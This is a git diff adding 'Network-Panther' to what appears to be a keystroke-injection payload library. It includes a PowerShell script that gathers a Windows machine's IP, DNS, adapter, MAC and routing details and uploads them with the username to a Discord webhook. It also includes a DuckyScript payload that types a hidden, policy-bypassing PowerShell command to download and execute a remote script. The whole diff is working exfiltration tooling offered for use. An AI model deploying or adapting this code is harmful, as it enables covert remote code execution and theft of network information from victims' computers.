diff --git a/payloads/library/exfiltration/Network-Panther/n.ps1 b/payloads/library/exfiltration/Network-Panther/n.ps1 new file mode 100644 index 0000000..1640e20 --- /dev/null +++ b/payloads/library/exfiltration/Network-Panther/n.ps1 @@ -0,0 +1,63 @@ +# n.ps1 +# This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook. + +function Send-ToDiscord { + param ( + [Parameter(Mandatory=$true)] + [string]$filePath, + [Parameter(Mandatory=$true)] + [string]$hookUrl + ) + + + $message = @{ + username = $env:USERNAME + content = "Uploading network configuration details" + } + + # Send message + Invoke-RestMethod -Uri $hookUrl -Method Post -ContentType 'Application/Json' -Body ($message | ConvertTo-Json) + + # Upload the file + curl.exe -F "file1=@$filePath" $hookUrl +} + +# Specify the Discord webhook URL here +$discordWebhookUrl = 'YOUR_DISCORD_WEBHOOK_URL' + + +function Get-NetworkDetails { + $output = @() + + + $output += "IP Configuration:`n" + $output += Get-NetIPConfiguration | Out-String -Width 4096 + + $output += "`nDNS Client Settings:`n" + $output += Get-DnsClient | Out-String -Width 4096 + + $output += "`nDNS Server Addresses:`n" + $output += Get-DnsClientServerAddress | Out-String -Width 4096 + + $output += "`nNetwork Interface Details:`n" + $output += Get-NetAdapter | Format-Table Name, Status, MacAddress, LinkSpeed -AutoSize | Out-String -Width 4096 + + $output += "`nRouting Table:`n" + $output += Get-NetRoute | Format-Table DestinationPrefix, NextHop, RouteMetric, ifIndex -AutoSize | Out-String -Width 4096 + + return $output +} + +# Get the network details +$networkDetails = Get-NetworkDetails + +# Save to temp file +$tempFile = [IO.Path]::GetTempFileName() + ".txt" +$networkDetails | Out-File $tempFile + +# Send to Discord +Send-ToDiscord -filePath $tempFile -hookUrl $discordWebhookUrl + +Remove-Item $tempFile + + diff --git a/payloads/library/exfiltration/Network-Panther/payload.txt b/payloads/library/exfiltration/Network-Panther/payload.txt new file mode 100644 index 0000000..127ae9e --- /dev/null +++ b/payloads/library/exfiltration/Network-Panther/payload.txt @@ -0,0 +1,14 @@ +REM Title: Network-Panther +REM Author: atomiczsec +REM Description: This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook. + +DEFINE URL http://new-url.com/powershell.ps1 + +REM Target: Windows 10 or 11 +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl +ENTER +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 diff --git a/payloads/library/exfiltration/Network-Panther/readme.md b/payloads/library/exfiltration/Network-Panther/readme.md new file mode 100644 index 0000000..4be0e61 --- /dev/null +++ b/payloads/library/exfiltration/Network-Panther/readme.md @@ -0,0 +1,86 @@ + +